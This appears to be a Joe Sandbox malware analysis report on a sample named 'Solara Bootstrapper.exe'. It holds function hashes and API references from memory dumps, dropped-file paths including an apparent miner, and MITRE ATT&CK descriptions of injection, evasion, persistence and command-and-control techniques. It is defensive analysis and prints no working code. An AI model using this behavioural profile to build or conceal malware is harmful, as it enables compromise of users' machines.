Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
Instruction ID: a5c049cb69e96cfbb56616fdcd891d3e75a6c1cb872cb67dafead8936c6c1fcc
Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
Instruction Fuzzy Hash: 28110632B50B018AEB008B61E8542A833A4F719768F540E21DF6D87BA4DF78C598D2C1

Function 00000140ADFC9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 00000140ADFC9EB7

Strings

RCC, xrefs: 00000140ADFC9E85
MOC, xrefs: 00000140ADFC9E7C

Memory Dump Source

Source File: 00000044.00000002.3352596228.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140adfc0000_lsass.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction ID: fd2f36d4469ca00d580b9035ee875e4ebab09abcf6c64778c8a765e7c8b01963
Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction Fuzzy Hash: E9619F33610B888AEB21DF66D0403DE77B2FB48B89F244215EF4917BA8DB38D166D700

Function 00000140AE862330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000140AE862416
StrCpyW.SHLWAPI ref: 00000140AE86242D

Strings

\\.\pipe\, xrefs: 00000140AE862421

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
Instruction ID: c9d078df74486e421dded553d044dc307dfc5948a87b49d5b9b062cc3c97baf6
Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
Instruction Fuzzy Hash: EE51E03228438181E676DB2FA1583EAA791F3CD7A4F640165DF4D03BAADA39CD44C7C2

Function 00000140AE8726F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00000140AE872807
GetLastError.KERNEL32 ref: 00000140AE872829

Strings

U, xrefs: 00000140AE8727B3

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
Instruction ID: 3e73605a521e4cce57338457d13aec77e0fda4a33a28f7c4ac6780cba42ba59d
Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
Instruction Fuzzy Hash: 48417172615B8086DB219F6AE8443E977A1F7987A4F604025EF4D87BA4DB3CC941C781

Function 00000140AE8694A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 00000140AE8694F0
RaiseException.KERNEL32 ref: 00000140AE869531

Strings

csm, xrefs: 00000140AE86951E

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
Instruction ID: c81f436458b37827e035cf8ccd5af5f126ed8c86e3896386e64a1e0766a3eb38
Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
Instruction Fuzzy Hash: D7112B32614B8082EB628B16E44439977E5F788BA8F684260EF8C077A9DF3CC955CB40

Function 00000140ADFC7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 00000140ADFC737C

Strings

riptor at (, xrefs: 00000140ADFC7364
ierarchy Descriptor', xrefs: 00000140ADFC7381

Memory Dump Source

Source File: 00000044.00000002.3352596228.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140adfc0000_lsass.jbxd

Similarity

API ID: __std_exception_copy
String ID: ierarchy Descriptor'$riptor at (
API String ID: 592178966-758928094
Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
Instruction ID: 56ed09fddae288ef6c89d74bd241d2dfe88a9543861981f92f91ccf0ba0ae745
Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
Instruction Fuzzy Hash: DCE08671650B4892DF038F22E8402D933A3DF5DB68B9891229A5C07321FA38D1FAD301

Function 00000140ADFC73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 00000140ADFC73D8

Strings

riptor at (, xrefs: 00000140ADFC73C0
Locator', xrefs: 00000140ADFC73DD

Memory Dump Source

Source File: 00000044.00000002.3352596228.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140adfc0000_lsass.jbxd

Similarity

API ID: __std_exception_copy
String ID: Locator'$riptor at (
API String ID: 592178966-4215709766
Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
Instruction ID: 4940423c840106aa278dadeec7b987efc7fd2bbde3a41644df2d62b25ed6cadf
Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
Instruction Fuzzy Hash: 05E08671610B4886DF028F22E4401D97363EF5DB58B989122CA4C07321FA38D1E6D300

Function 00000140AE861BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000140AE861C2D
HeapAlloc.KERNEL32 ref: 00000140AE861C3B
GetProcessHeap.KERNEL32 ref: 00000140AE861C77
HeapFree.KERNEL32 ref: 00000140AE861C85

Part of subcall function 00000140AE86152C: StrCmpIW.SHLWAPI ref: 00000140AE86155D

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
Instruction ID: 65c83ae18bbeee38c1f395d24bd21a894001158fe5ba6808c8c40ff99673c146
Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
Instruction Fuzzy Hash: 0F119E35A41B5485EB46DB6BA8082A977A1FB8DFE0F284028DF4D47776DF38C842D381

Function 00000140AE861268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000140AE86126E
HeapAlloc.KERNEL32 ref: 00000140AE86127D
GetProcessHeap.KERNEL32 ref: 00000140AE861297
HeapAlloc.KERNEL32 ref: 00000140AE8612A8

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
Instruction ID: 8c25a065afb30b7e91423b8a6a5c310c77542b609ab35f2169316764477aec7c
Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
Instruction Fuzzy Hash: 47E03935A4170486EB068B63D80838A36E1EB8EB26F2480248E0907361DF7D8899D7A1

Analysis Process: eejhedztifcv.exePID: 7948, Parent PID: 632COMMON

Executed Functions

Function 00007FF6699D1140 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000047.00000002.2233563078.00007FF6699D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6699D0000, based on PE: true

Associated: 00000047.00000002.2233495422.00007FF6699D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000047.00000002.2233607130.00007FF6699DC000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000047.00000002.2233693184.00007FF6699DF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000047.00000002.2233732238.00007FF6699E0000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000047.00000002.2234554645.00007FF669F09000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000047.00000002.2234582919.00007FF669F0C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_71_2_7ff6699d0000_eejhedztifcv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
Instruction ID: bdf6e4ae5ebedcd903a82c36378723d9ef54071114487fe1100b90e51772490a
Opcode Fuzzy Hash: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
Instruction Fuzzy Hash: 58B01231D04B0AC4EB042F41D8C136832706B0A780F444130CC0C4B353CE7D50844B50

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	Drive: Drive Modification, File: File Modification, Firmware: Firmware Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Solara Bootstrapper.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Change of critical system settings

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Change of critical system settings

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SolaraBootstrapper.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\Kawpow new.exe

C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1licbn4e.0go.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1uas1bpl.ght.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_532e2cnj.oqk.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ira0ikb.vii.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bsifrdxz.e3v.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dglgwxap.t5a.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_etqdorbh.ajr.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fawumelu.1kv.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ld1osop1.y50.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ot0yrdtk.r54.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pspgbk4o.ep3.ps1

Windows Analysis Report
Solara Bootstrapper.exe

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre